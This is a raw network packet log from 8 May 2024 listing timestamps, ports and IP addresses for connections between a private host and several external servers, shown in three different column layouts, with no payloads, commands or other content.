May 8, 2024 15:24:22.023729086 CEST | 80 | 49754 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.023797989 CEST | 49754 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:22.131388903 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.131413937 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.131465912 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.131576061 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.131591082 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.131652117 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.131665945 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.131757975 CEST | 49755 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:22.131758928 CEST | 49755 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:22.131774902 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.131795883 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.131808996 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.131809950 CEST | 49755 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:22.131874084 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.131900072 CEST | 49755 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:22.131977081 CEST | 49755 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:22.132488012 CEST | 49755 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:22.132543087 CEST | 49755 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:22.471158028 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.471179962 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.471194029 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.471206903 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.471221924 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.471240044 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.471250057 CEST | 49755 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:22.471254110 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.471268892 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.471282005 CEST | 80 | 49755 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:22.471282005 CEST | 49755 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:22.471309900 CEST | 49755 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:22.471337080 CEST | 49755 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:22.471337080 CEST | 49755 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:23.717315912 CEST | 49756 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.061748981 CEST | 80 | 49756 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.061845064 CEST | 49756 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.062493086 CEST | 49756 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.158431053 CEST | 49757 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.408976078 CEST | 80 | 49756 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.408998966 CEST | 80 | 49756 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.409092903 CEST | 49756 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.409182072 CEST | 80 | 49756 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.409221888 CEST | 80 | 49756 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.409239054 CEST | 80 | 49756 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.409260035 CEST | 49756 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.409292936 CEST | 49756 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.409734964 CEST | 80 | 49756 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.409749031 CEST | 80 | 49756 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.409779072 CEST | 49756 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.409801006 CEST | 49756 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.409843922 CEST | 80 | 49756 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.409858942 CEST | 80 | 49756 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.409884930 CEST | 49756 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.409898996 CEST | 49756 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.497241974 CEST | 49756 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.497278929 CEST | 49756 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.501714945 CEST | 80 | 49757 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.502624035 CEST | 49757 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.503726959 CEST | 49757 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.843445063 CEST | 80 | 49757 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.843621969 CEST | 80 | 49757 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.843640089 CEST | 80 | 49757 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.843713999 CEST | 80 | 49757 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.843729019 CEST | 80 | 49757 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.843729973 CEST | 49757 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.843743086 CEST | 80 | 49757 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.843758106 CEST | 80 | 49757 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.843758106 CEST | 49757 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.843779087 CEST | 49757 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.843818903 CEST | 49757 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:24.843832970 CEST | 80 | 49757 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.843846083 CEST | 80 | 49757 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:24.843890905 CEST | 49757 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:25.123274088 CEST | 49757 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:25.123328924 CEST | 49757 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:25.649127007 CEST | 80 | 49742 | 91.202.233.141 | 192.168.2.8
May 8, 2024 15:24:25.649298906 CEST | 49742 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:24:27.157004118 CEST | 49758 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:27.496258020 CEST | 80 | 49758 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:27.496465921 CEST | 49758 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:27.497114897 CEST | 49758 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:27.544567108 CEST | 49742 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:24:27.545053005 CEST | 49759 | 80 | 192.168.2.8 | 91.202.233.141
May 8, 2024 15:24:27.836007118 CEST | 80 | 49758 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:27.836029053 CEST | 80 | 49758 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:27.836113930 CEST | 49758 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:27.836129904 CEST | 80 | 49758 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:27.836144924 CEST | 80 | 49758 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:27.836158037 CEST | 80 | 49758 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:27.836169958 CEST | 49758 | 80 | 192.168.2.8 | 185.215.113.66
May 8, 2024 15:24:27.836173058 CEST | 80 | 49758 | 185.215.113.66 | 192.168.2.8
May 8, 2024 15:24:27.836184978 CEST | 49758 | 80 | 192.168.2.8 | 185.215.113.66
                                                                              May 8, 2024 15:24:27.836184978 CEST8049758185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:27.836199045 CEST8049758185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:27.836205959 CEST4975880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:27.836211920 CEST8049758185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:27.836224079 CEST4975880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:27.836225033 CEST8049758185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:27.836236000 CEST8049758185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:27.836256027 CEST4975880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:27.836277962 CEST4975880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:27.836939096 CEST4975880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:27.836966038 CEST4975880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:27.899477005 CEST804974291.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:27.903072119 CEST804975991.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:27.903278112 CEST4975980192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:27.903503895 CEST4975980192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:28.175035954 CEST8049758185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:28.175154924 CEST4975880192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:28.262106895 CEST804975991.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:28.262655020 CEST804975991.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:28.262718916 CEST4975980192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:30.294775009 CEST4975980192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:30.652537107 CEST804975991.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:30.652726889 CEST4975980192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:30.669435024 CEST4976040500192.168.2.837.151.73.50
                                                                              May 8, 2024 15:24:30.874665022 CEST4976180192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:31.229403973 CEST804976191.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:31.229593992 CEST4976180192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:31.229809046 CEST4976180192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:31.584520102 CEST804976191.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:31.584639072 CEST804976191.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:31.588905096 CEST4976180192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:31.683870077 CEST4976040500192.168.2.837.151.73.50
                                                                              May 8, 2024 15:24:32.685553074 CEST4975980192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:33.043720961 CEST804975991.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:33.043939114 CEST4975980192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:33.608110905 CEST4976180192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:33.608532906 CEST4976280192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:33.699409962 CEST4976040500192.168.2.837.151.73.50
                                                                              May 8, 2024 15:24:33.959816933 CEST804976291.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:33.960004091 CEST4976280192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:33.960163116 CEST4976280192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:33.965321064 CEST804976191.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:33.965388060 CEST4976180192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:34.309273958 CEST804976291.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:34.309627056 CEST804976291.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:34.309715033 CEST4976280192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:36.093719006 CEST4976380192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:36.341828108 CEST4976280192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:36.342227936 CEST4976480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:36.446173906 CEST8049763193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:36.690943956 CEST804976291.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:36.691046000 CEST4976280192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:36.700125933 CEST804976491.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:36.700257063 CEST4976480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:36.700463057 CEST4976480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:37.058028936 CEST804976491.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:37.058093071 CEST804976491.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:37.058150053 CEST4976480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:37.105639935 CEST4976380192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:37.458084106 CEST8049763193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:37.715078115 CEST4976040500192.168.2.837.151.73.50
                                                                              May 8, 2024 15:24:38.105685949 CEST4976380192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:38.458187103 CEST8049763193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:38.996340036 CEST4976380192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:39.091922998 CEST4976480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:39.092231989 CEST4976580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:39.351284981 CEST8049763193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:39.447227001 CEST804976591.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:39.447403908 CEST4976580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:39.447741032 CEST4976580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:39.449322939 CEST804976491.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:39.449409962 CEST4976480192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:39.802176952 CEST804976591.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:39.802493095 CEST804976591.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:39.802541018 CEST4976580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:39.902517080 CEST4976380192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:40.254822016 CEST8049763193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:42.273962021 CEST4976580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:42.274257898 CEST4976680192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:42.284504890 CEST4976780192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:42.628588915 CEST804976591.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:42.628703117 CEST4976580192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:42.629143000 CEST804976691.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:42.629256964 CEST4976680192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:42.636826992 CEST8049767193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:42.656124115 CEST4976680192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:43.010967016 CEST804976691.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:43.011125088 CEST804976691.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:43.011173964 CEST4976680192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:43.308806896 CEST4976780192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:43.661237001 CEST8049767193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:44.308841944 CEST4976780192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:44.661955118 CEST8049767193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:45.029978991 CEST4976680192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:45.030364990 CEST4976880192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:45.293174982 CEST4972480192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:45.293195963 CEST4976780192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:45.382992029 CEST804976891.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:45.383222103 CEST4976880192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:45.383446932 CEST4976880192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:45.386250019 CEST804976691.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:45.386321068 CEST4976680192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:45.648209095 CEST8049767193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:45.730830908 CEST4976040500192.168.2.837.151.73.50
                                                                              May 8, 2024 15:24:45.734060049 CEST804976891.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:45.734081030 CEST804976891.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:45.734230042 CEST4976880192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:46.293358088 CEST4976780192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:46.645741940 CEST8049767193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:48.671205044 CEST4976980192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:48.780169010 CEST4977080192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:48.793271065 CEST4976880192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:49.024666071 CEST8049769193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:49.129390955 CEST8049770193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:49.143738031 CEST804976891.202.233.141192.168.2.8
                                                                              May 8, 2024 15:24:49.143843889 CEST4976880192.168.2.891.202.233.141
                                                                              May 8, 2024 15:24:49.527539968 CEST4976980192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:49.636898994 CEST4977080192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:49.881445885 CEST8049769193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:49.986100912 CEST8049770193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:50.386926889 CEST4976980192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:50.496301889 CEST4977080192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:50.740797997 CEST8049769193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:50.845356941 CEST8049770193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:51.246344090 CEST4976980192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:51.355619907 CEST4977080192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:51.599797964 CEST8049769193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:51.704866886 CEST8049770193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:52.105643034 CEST4976980192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:52.215121031 CEST4977080192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:52.459048033 CEST8049769193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:52.564243078 CEST8049770193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:54.592118025 CEST4977180192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:54.944731951 CEST8049771193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:55.449462891 CEST4977180192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:55.607922077 CEST4977280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:55.801961899 CEST8049771193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:55.955373049 CEST8049772185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:55.958645105 CEST4977280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:55.958838940 CEST4977280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:56.300302982 CEST8049772185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:56.300591946 CEST8049772185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:56.300746918 CEST4977280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:56.300753117 CEST8049772185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:56.300765991 CEST8049772185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:56.300777912 CEST8049772185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:56.300792933 CEST8049772185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:56.300805092 CEST4977280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:56.300806046 CEST8049772185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:56.300821066 CEST8049772185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:56.300833941 CEST8049772185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:56.300848007 CEST4977280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:56.300864935 CEST4977280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:56.300889015 CEST4977280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:56.301624060 CEST4977280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:56.301645994 CEST4977280192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:56.308803082 CEST4977180192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:56.661303997 CEST8049771193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:56.766946077 CEST4977340500192.168.2.8201.171.26.123
                                                                              May 8, 2024 15:24:57.168299913 CEST4977180192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:57.520993948 CEST8049771193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:57.777496099 CEST4977340500192.168.2.8201.171.26.123
                                                                              May 8, 2024 15:24:58.027510881 CEST4977180192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:24:58.381700993 CEST8049771193.233.132.177192.168.2.8
                                                                              May 8, 2024 15:24:58.472373962 CEST4977480192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:58.812936068 CEST8049774185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:24:58.814743996 CEST4977480192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:59.695621014 CEST4977480192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:24:59.777513981 CEST4977340500192.168.2.8201.171.26.123
                                                                              May 8, 2024 15:25:00.036994934 CEST8049774185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:00.037353992 CEST8049774185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:00.037369013 CEST8049774185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:00.037383080 CEST8049774185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:00.037398100 CEST8049774185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:00.037410975 CEST8049774185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:00.037431955 CEST8049774185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:00.037441015 CEST4977480192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:00.037486076 CEST4977480192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:00.037494898 CEST8049774185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:00.037497997 CEST4977480192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:00.037509918 CEST8049774185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:00.037530899 CEST4977480192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:00.037549973 CEST4977480192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:00.038170099 CEST4977480192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:00.038192987 CEST4977480192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:00.378765106 CEST8049774185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:00.378824949 CEST4977480192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:00.379173040 CEST8049774185.215.113.66192.168.2.8
                                                                              May 8, 2024 15:25:00.379216909 CEST4977480192.168.2.8185.215.113.66
                                                                              May 8, 2024 15:25:00.701702118 CEST4977580192.168.2.8193.233.132.177
                                                                              May 8, 2024 15:25:01.050559998 CEST8049775193.233.132.177192.168.2.8
Timestamp                            Src Port  Dst Port  Source IP        Dest IP
May 8, 2024 15:25:01.699397087 CEST  49775     80        192.168.2.8      193.233.132.177
May 8, 2024 15:25:02.048221111 CEST  80        49775     193.233.132.177  192.168.2.8
May 8, 2024 15:25:02.061494112 CEST  49776     80        192.168.2.8      185.215.113.66
May 8, 2024 15:25:02.401657104 CEST  80        49776     185.215.113.66   192.168.2.8
May 8, 2024 15:25:02.402621031 CEST  49776     80        192.168.2.8      185.215.113.66
May 8, 2024 15:25:02.402909040 CEST  49776     80        192.168.2.8      185.215.113.66
May 8, 2024 15:25:02.699433088 CEST  49775     80        192.168.2.8      193.233.132.177
May 8, 2024 15:25:02.742908001 CEST  80        49776     185.215.113.66   192.168.2.8
May 8, 2024 15:25:02.743000984 CEST  80        49776     185.215.113.66   192.168.2.8
May 8, 2024 15:25:02.743066072 CEST  80        49776     185.215.113.66   192.168.2.8
May 8, 2024 15:25:02.743144035 CEST  80        49776     185.215.113.66   192.168.2.8
May 8, 2024 15:25:02.743159056 CEST  49776     80        192.168.2.8      185.215.113.66
May 8, 2024 15:25:02.743196011 CEST  49776     80        192.168.2.8      185.215.113.66
May 8, 2024 15:25:02.743210077 CEST  80        49776     185.215.113.66   192.168.2.8
May 8, 2024 15:25:02.743585110 CEST  80        49776     185.215.113.66   192.168.2.8
May 8, 2024 15:25:02.743599892 CEST  80        49776     185.215.113.66   192.168.2.8
May 8, 2024 15:25:02.743628979 CEST  49776     80        192.168.2.8      185.215.113.66
May 8, 2024 15:25:02.743649006 CEST  49776     80        192.168.2.8      185.215.113.66
May 8, 2024 15:25:02.743649960 CEST  80        49776     185.215.113.66   192.168.2.8
May 8, 2024 15:25:02.743689060 CEST  49776     80        192.168.2.8      185.215.113.66
May 8, 2024 15:25:02.743817091 CEST  49776     80        192.168.2.8      185.215.113.66
May 8, 2024 15:25:02.743844986 CEST  49776     80        192.168.2.8      185.215.113.66
May 8, 2024 15:25:02.743999004 CEST  80        49776     185.215.113.66   192.168.2.8
May 8, 2024 15:25:02.744051933 CEST  49776     80        192.168.2.8      185.215.113.66
May 8, 2024 15:25:03.043528080 CEST  80        49759     91.202.233.141   192.168.2.8
May 8, 2024 15:25:03.044682026 CEST  49759     80        192.168.2.8      91.202.233.141
May 8, 2024 15:25:03.048361063 CEST  80        49775     193.233.132.177  192.168.2.8
May 8, 2024 15:25:03.084794998 CEST  80        49776     185.215.113.66   192.168.2.8
May 8, 2024 15:25:03.090632915 CEST  49776     80        192.168.2.8      185.215.113.66
May 8, 2024 15:25:03.590070963 CEST  49775     80        192.168.2.8      193.233.132.177
May 8, 2024 15:25:03.780632019 CEST  49773     40500     192.168.2.8      201.171.26.123
May 8, 2024 15:25:03.938848019 CEST  80        49775     193.233.132.177  192.168.2.8
May 8, 2024 15:25:04.545890093 CEST  49775     80        192.168.2.8      193.233.132.177
May 8, 2024 15:25:04.894643068 CEST  80        49775     193.233.132.177  192.168.2.8
May 8, 2024 15:25:05.891446114 CEST  49759     80        192.168.2.8      91.202.233.141
May 8, 2024 15:25:05.894727945 CEST  49777     80        192.168.2.8      91.202.233.141
May 8, 2024 15:25:06.240184069 CEST  80        49777     91.202.233.141   192.168.2.8
May 8, 2024 15:25:06.240665913 CEST  49777     80        192.168.2.8      91.202.233.141
May 8, 2024 15:25:06.240839005 CEST  49777     80        192.168.2.8      91.202.233.141
May 8, 2024 15:25:06.248991013 CEST  80        49759     91.202.233.141   192.168.2.8
May 8, 2024 15:25:06.586226940 CEST  80        49777     91.202.233.141   192.168.2.8
May 8, 2024 15:25:06.586477041 CEST  80        49777     91.202.233.141   192.168.2.8
May 8, 2024 15:25:06.586554050 CEST  49777     80        192.168.2.8      91.202.233.141
May 8, 2024 15:25:06.748259068 CEST  49778     80        192.168.2.8      193.233.132.177
May 8, 2024 15:25:07.103209019 CEST  80        49778     193.233.132.177  192.168.2.8
May 8, 2024 15:25:07.605751038 CEST  49778     80        192.168.2.8      193.233.132.177
